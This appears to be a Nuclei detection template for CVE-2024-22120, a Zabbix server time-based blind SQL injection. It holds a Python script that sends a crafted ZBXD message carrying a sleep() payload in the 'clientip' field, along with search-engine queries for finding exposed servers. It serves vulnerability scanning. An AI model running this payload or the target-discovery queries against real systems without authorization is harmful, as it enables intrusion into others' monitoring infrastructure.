Zabbix Server - Time-Based Blind SQL injection

ID: CVE-2024-22120

Severity: critical

Author: CodeStuffBreakThings

Tags: cve,cve2024,authenticated,zabbix,sqli

Description

The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the “Audit Log”. Due to the “clientip” field not being sanitized, it is possible to inject SQL into “clientip” and exploit a time-based blind SQL injection vulnerability.

YAML Source

id: CVE-2024-22120

info:
  name: Zabbix Server - Time-Based Blind SQL injection
  author: CodeStuffBreakThings
  severity: critical
  description: |
    The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
  remediation: |
    Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
  reference:
    - https://support.zabbix.com/browse/ZBX-24505#/
    - https://github.com/W01fh4cker/CVE-2024-22120-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
    - https://support.zabbix.com/browse/ZBX-24505
    - https://github.com/AboSteam/POPC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-22120
    cwe-id: CWE-20
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
      - http.favicon.hash:"892542951"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2024,authenticated,zabbix,sqli
variables:
  HOST: "{{Host}}"
  PORT: "{{Port}}"
  SID: "{{SID}}"
  HOSTID: "{{HOSTID}}"

code:
  - engine:
      - py
      - python3
    source: |
      import os, struct, socket
      from datetime import datetime
      hostname=os.getenv('HOST')
      port=int(os.getenv('PORT'))
      sid=os.getenv('SID')
      hostid=os.getenv('HOSTID')
      zbx_header = "ZBXD\x01".encode()
      message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
      message_length = struct.pack('<q', len(message_json))
      message = zbx_header + message_length + message_json.encode()
      before_query = datetime.now().timestamp()
      s = socket.socket()
      s.connect((hostname,port))
      s.send(message)
      response = s.recv(1024)
      s.close()
      after_query = datetime.now().timestamp()
      responsetime = after_query - before_query
      if responsetime >= 10 and zbx_header in response:
          print("Vulnerable to CVE-2024-22120")

    matchers:
      - type: word
        words:
          - "Vulnerable to CVE-2024-22120"
# digest: 490a004630440220373630574dc675bb0fb8395e3ba509866bb2524b66ba5af917e1c88af91ec0aa022072b103b17bfeb7f48ed7ba168e35269ee51e499398be47a1c2f98f07cb4cd689:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-22120.yaml"

View on Github